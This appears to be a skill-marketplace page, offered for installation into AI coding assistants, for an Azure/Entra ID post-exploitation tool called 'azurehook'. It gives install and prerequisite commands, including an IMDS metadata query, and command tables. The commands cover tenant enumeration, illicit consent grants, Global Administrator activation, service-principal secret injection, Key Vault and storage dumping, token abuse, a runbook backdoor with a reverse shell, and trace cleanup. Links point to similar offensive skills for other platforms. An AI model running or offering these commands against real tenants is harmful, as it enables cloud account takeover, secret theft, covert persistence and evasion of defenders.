메뉴
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations
| name | azure-postexploit |
| description | Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation |
| category | post-exploitation |
| tags | ["azure","entra-id","cloud","post-exploitation","keyvault","managed-identity","credential-access","persistence","token-abuse"] |
| tech_stack | ["azure","python","msal","msgraph","requests"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-284"] |
| chains_with | ["T1078.004","T1552.001","T1098.001","T1550.001","T1528"] |
| prerequisites | ["T1078.004"] |
| version | 1.0 |
Azure post-exploitation uses Microsoft Graph API, Azure Resource Manager API, and direct IMDS access for tenant enumeration, privilege escalation, secret extraction, and persistence. After compromising Azure credentials or a managed identity, these tools provide comprehensive Entra ID and Azure resource exploitation capabilities.
pip3 install requests msal azure-identity azure-keyvault-secrets azure-storage-blobaz account show or Graph API /me endpoint# Quick prerequisite check
az account show # verify Azure CLI credentials
python3 -c "import requests; print('OK')" # verify requests
curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" 2>/dev/null && echo "IMDS available"
| Action | Command | Purpose |
|---|---|---|
| Entra ID enum | azurehook entra_enum | Enumerate users, groups, apps, SPs, conditional access |
| Managed identity | azurehook managed_identity | Extract managed identity tokens from VM/App Service |
| Action | Command | Purpose |
|---|---|---|
| Consent grant | azurehook entra_privesc --method consent_grant | Illicit consent grant for Directory.ReadWrite.All |
| PIM activation | azurehook entra_privesc --method pim_activate | Activate eligible Global Administrator role |
| SP secret | azurehook entra_privesc --method sp_secret | Add client secret to existing service principal |
| Action | Command | Purpose |
|---|---|---|
| Key Vault dump | azurehook keyvault_dump | Extract secrets, keys, certificates from Key Vaults |
| Storage dump | azurehook storage_dump | Download sensitive data from Blob Storage |
| Token abuse | azurehook azuread_token --action foci | Use FOCI to get tokens for multiple services |
| Action | Command | Purpose |
|---|---|---|
| Runbook backdoor | azurehook runbook_backdoor --automation-account NAME --resource-group RG | Create Automation runbook with reverse shell |
azurehook cleanup_azure
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| entra_enum | Entra ID tenant enumeration | T1087.004 — Cloud Account |
| entra_privesc | Privilege escalation via consent/PIM/SP | T1098.001 — Additional Cloud Credentials |
| keyvault_dump | Key Vault secret extraction | T1555.006 — Cloud Secrets Management Stores |
| storage_dump | Azure Storage data exfiltration | T1530 — Data from Cloud Storage |
| managed_identity | Managed identity token harvest | T1552.005 — Cloud Instance Metadata API |
| runbook_backdoor | Automation Account persistence | T1525 — Implant Internal Image |
| azuread_token | Token manipulation and FOCI abuse | T1550.001 — Application Access Token |
| cleanup_azure | Resource removal and restoration | T1070 — Indicator Removal |